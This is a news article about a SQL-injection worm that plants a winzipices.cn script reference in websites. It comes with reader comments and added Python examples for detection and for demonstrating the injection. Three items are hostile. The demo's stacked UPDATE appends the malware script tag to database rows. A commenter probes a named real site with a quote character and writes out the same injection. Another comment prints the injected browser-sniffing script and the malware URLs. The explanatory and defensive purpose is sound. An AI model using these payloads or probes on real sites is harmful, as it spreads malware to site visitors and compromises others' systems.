Web attack worm on a rampage

The Internet Storm Center, which tracks online threats, warned Wednesday that a worm is infecting vulnerable Web sites through a database attack. Though relatively small by Web attack standards, with about 4,000 reported infected sites, the assault plants a hidden script reference in a site's pages; a visitor's browser loads that script, which then tries to push malware onto the PC. Bad PR, to say the least.

IMPORTANT: DO NOT visit the domain named in the following test, or any sites that show up on a Web search as having this domain listed in their pages' code (including cached pages). Doing so could infect your PC with malware.

To see if your site has been hit, run a Google search of the form site:yourcompanydomain winzipices.cn (for example, site:pcworld.com winzipices.cn), or search for that domain in your Web site's HTML source. If you find anything, let your IT staff know immediately. When I ran a search just now I saw sites for everything from insurance companies to cemeteries to universities that all appear to have been infected.

The worm uses a SQL injection attack, according to the ISC, but the ISC doesn't yet know which specific vulnerability is targeted. The attack highlights the importance of keeping your site secure, something I wrote about last month. It's likewise critical to keep your own PC software up to date, as the ISC says visitors to infected sites can be hit via a known flaw in older versions of RealPlayer.
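The check the article suggests, worked through as an added example that is not part of the article: a small Python scanner that parses saved HTML and reports only pages that actually load code from the attacker's domain. Pages that merely mention winzipices.cn in their text (news stories about the worm, which a plain web search for the domain also returns) are reported separately. The sample pages are constructed for the demonstration; only the domain and the 2.js path come from this page.

```python
"""Scan HTML for script/iframe references to an attacker-controlled domain.

Added example, not code from the article. The sample pages below are
constructed; only winzipices.cn and the 2.js path come from the page.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

BAD_DOMAIN = "winzipices.cn"  # domain named in the article


class _RefCollector(HTMLParser):
    """Collect the targets of tags that make the browser fetch and run code."""

    FETCH_TAGS = {"script": "src", "iframe": "src", "object": "data", "embed": "src"}

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        attr = self.FETCH_TAGS.get(tag.lower())
        if attr is None:
            return
        for name, value in attrs:
            if name.lower() == attr and value:
                self.refs.append((tag.lower(), value.strip()))


def injected_refs(html, bad_domain=BAD_DOMAIN):
    """Return [(tag, url)] for every code-loading reference whose host is
    bad_domain or a subdomain of it. Protocol-relative URLs (//host/x.js)
    resolve a hostname too; relative paths have none and never match."""
    parser = _RefCollector()
    parser.feed(html)
    parser.close()
    hits = []
    for tag, url in parser.refs:
        host = (urlparse(url).hostname or "").lower()
        if host == bad_domain or host.endswith("." + bad_domain):
            hits.append((tag, url))
    return hits


def classify(html, bad_domain=BAD_DOMAIN):
    """'infected' if the page loads code from bad_domain, 'mentions' if the
    domain only appears as text (a story reporting the worm), else 'clean'."""
    if injected_refs(html, bad_domain):
        return "infected"
    if bad_domain in html.lower():
        return "mentions"
    return "clean"


def scan_pages(pages):
    """Map page name -> verdict for a dict of {name: html}."""
    return {name: classify(html) for name, html in pages.items()}


# Constructed sample pages (not real site content).
INFECTED = """<html><body><h1>Directory</h1>
<p>Bed &amp; Breakfast listings<script src="http://winzipices.cn/2.js"></script></p>
</body></html>"""
REPORTING = """<html><body><p>ISC warns that a worm injects a reference to
winzipices.cn into vulnerable sites.</p></body></html>"""
CLEAN = """<html><body><script src="/js/site.js"></script>
<p>Bed &amp; Breakfast listings</p></body></html>"""

if __name__ == "__main__":
    for name, verdict in scan_pages(
        {"infected": INFECTED, "reporting": REPORTING, "clean": CLEAN}
    ).items():
        print(name, "->", verdict)
```

Run it over a crawl of your own site's rendered pages (what the browser receives, not the templates), since the injected tag lives in database strings and only appears in the generated HTML.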

News Source: Computer World


34 Comments


Makes me think how valuable Vista's UAC actually is! If I came across a vulnerability like this, AFAIK a UAC dialog should pop up asking for admin privileges, and since I never get those UAC dialogs while just browsing the net, I'd be very suspicious and I'm sure most people would be, too.

See, UAC ain't that bad :P real world example of why you should leave it on and just quit moaning about it once and for all!

It's quite obvious how this attack works, though I'm not sure what makes it a worm (maybe the payload scans more sites?).

The attack virus checks for simple SQL injection holes in ASP pages (by spidering the site and putting bad data for the URL/CGI parameters that would output an OLE/ODBC error on the webpage). Once an SQL injection hole is found, it's a trivial matter to get the database structure and insert the payload script reference into various strings.

For example, the first hit for "site:* winzipices.cn" on google:

http://www.wiredseniors.com/seniorssearch/...d_And_Breakfast

Let's test the cn parameter in the URL:

http://www.wiredseniors.com/seniorssearch/...?cn=152101'

It returns:

Microsoft OLE DB Provider for SQL Server error '80040e21'

The requested properties cannot be supported.

E:\DOMAINS\WIREDSENIORS.COM\WWWROOT\SENIORSSEARCH\DIRECTORY\../../cgi-bin/seniorssearch/dir/page_include_new.asp, line 133

With a bit more searching, it shouldn't be hard to find a proper SQL injection hole. Then you just need to get the database structure to figure out which tables to UPDATE blah SET blah = blah + '<script src="http://winzipices.cn/2.js"></script>'.

ASP SQL injection is so popular that I'm surprised an automated attack hasn't happened until now.
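The chain the comment above describes, worked through as an added example (my code, not the commenter's and not the worm's): the classic-ASP concatenation, the single-quote probe that surfaces a database error, the stacked UPDATE that appends the script reference to every row, and the parameterized query that defeats both. An in-memory SQLite table with constructed rows stands in for the site's SQL Server database; only the script reference http://winzipices.cn/2.js comes from the page. Two deliberate substitutions are labelled in the code: SQLite concatenates strings with || rather than SQL Server's +, and executescript() is used to mimic ADO's acceptance of stacked statements.

```python
"""SQL-injection chain from the comment above, against an in-memory SQLite
table (added example; constructed data, not the site's). Only the reference
http://winzipices.cn/2.js comes from the page."""
import sqlite3

# The reference the worm appends to string columns (from the page).
SCRIPT_TAG = '<script src="http://winzipices.cn/2.js"></script>'


def fresh_db():
    """Stand-in for the site's SQL Server database, with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE listings (cn INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO listings VALUES (152101, 'Bed and Breakfast');
        INSERT INTO listings VALUES (152102, 'Retirement Community');
    """)
    return conn


def page_query_vulnerable(conn, cn):
    """Classic-ASP pattern: the cn request parameter is pasted into the SQL.

    ADO hands the whole string to SQL Server, which runs every statement in
    it (stacked queries); sqlite3's executescript() mimics that, since
    execute() refuses more than one statement. A stray quote makes the parser
    fail, and that error is what the ASP page echoes back to the browser."""
    sql = "SELECT name FROM listings WHERE cn = " + cn
    conn.executescript(sql)


def page_query_safe(conn, cn):
    """Hardened version: the value is bound as a parameter, never spliced in.
    A payload arrives as one opaque value that simply matches no row."""
    return conn.execute("SELECT name FROM listings WHERE cn = ?", (cn,)).fetchall()


def probe(conn, query, cn="152101"):
    """The worm's detection step: send cn=152101' and watch for a database
    error. True means the parameter reaches the SQL parser unescaped."""
    try:
        query(conn, cn + "'")
    except sqlite3.OperationalError:
        return True
    return False


# Stacked UPDATE appending the script reference to every row, as the comment
# describes (SQL Server concatenates with +, SQLite with ||).
PAYLOAD = "152101; UPDATE listings SET name = name || '" + SCRIPT_TAG + "'"


def listing_names(conn):
    """Current contents of the string column the worm targets, in cn order."""
    return [row[0] for row in conn.execute("SELECT name FROM listings ORDER BY cn")]


if __name__ == "__main__":
    conn = fresh_db()
    print("vulnerable page injectable:", probe(conn, page_query_vulnerable))
    page_query_vulnerable(conn, PAYLOAD)
    print("after payload:", listing_names(conn))

    conn = fresh_db()
    print("hardened page injectable:", probe(conn, page_query_safe))
    print("hardened page rows for payload:", page_query_safe(conn, PAYLOAD))
    print("after payload:", listing_names(conn))
```

The probe is the cheap part of the worm: one request per parameter, and the verbose OLE DB error shown in the comment is the signal. Turning off detailed error pages hides the signal but not the hole; only parameter binding (or, in classic ASP, ADODB.Command with Parameters) removes it.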

infected sites can be hit via a known flaw in old Real Player software.

Anyone still use Real Player?? :P (Besides grandma?)

One of my company's clients got hit with this. I was feeling kind of crummy that I couldn't figure out the attack vector, but it's nice for my ego to see that the security experts haven't figured it out either.

// Swallow any script error so the injected code never surfaces a dialog.
window.onerror = function () { return true; };

// One document.writeln per targeted browser; the HTML written here is
// empty as posted.
if (Isie6()) {
    document.writeln("");
}

if (Isie7()) {
    document.writeln("");
}

// Assignment inside the condition, as in the original: sets a global isFirefox.
if (isFirefox = navigator.userAgent.indexOf("Firefox") > 0) {
    document.writeln("");
}

// Crude User-Agent sniffing: true only when the "MSIE" version parses as 6.
function Isie6() {
    var agent = navigator.userAgent;
    str = "MSIE";
    if ((i = agent.indexOf(str)) >= 0) {
        this.isIE = true;
        if (parseFloat(agent.substr(i + str.length)) == 6) {
            return true;
        } else {
            return false;
        }
    }
}

// Same check for version 7 (str and i are leaked as globals, as above).
function Isie7() {
    var agent = navigator.userAgent;
    str = "MSIE";
    if ((i = agent.indexOf(str)) >= 0) {
        this.isIE = true;
        if (parseFloat(agent.substr(i + str.length)) == 7) {
            return true;
        } else {
            return false;
        }
    }
}

It is the virus; Firefox is safe.

The virus will trigger with h**p://winzipices.cn/6.gif (Internet Explorer 6) and h**p://winzipices.cn/7.gif (Internet Explorer 7).

So what exactly does this do to you if you visit one of these sites?
I find it hard to believe that it manages to affect all browsers on all OS's, so a bit more information would be nice.
Unless it just pops up with a .exe to download or something stupid like that?

????

There is a script that opens an iframe; this iframe loads a file with the extension .as, and this .as finally opens the next picture:

http://www.bsu.edu/web/nmmakridakis/images/lolret6.jpg
(I don't find any virus in this file with my updated antivirus; maybe the virus is in the .as)

Well, I am running Vista x64, no antivirus, Defender disabled. I tried a few sites, nothing happened :(. I looked at the source of the script it loads, manually went to the page it tries to load in an iframe, and still nothing... I am rather disappointed :P

(some_guy said @ #5.1)
damn you are right... a lot of schools

I guess even schools don't have good admins. Didn't everyone talk up this worm weeks ago? It's a dev problem and not something in the software etc etc.

(u2_storm said @ #4)
I did a search and couldn't find anything... I tried a load of sites I use... nothing... anyone else?

Search for the attack site domain. Google returns 9250 sites with that code in it so far.

(GreyWolfSC said @ #4.1)
Search for the attack site domain. Google returns 9250 sites with that code in it so far.

A good percentage of the hits are from sites reporting the attack not infected sites.

(lardboy said @ #3)
Another good reason to be using firefox with noscript installed

You big girl, I'm hard & wise enough to use IE7 with everything on, but then I have a decent Anti-Virus and not McAfee or Norton.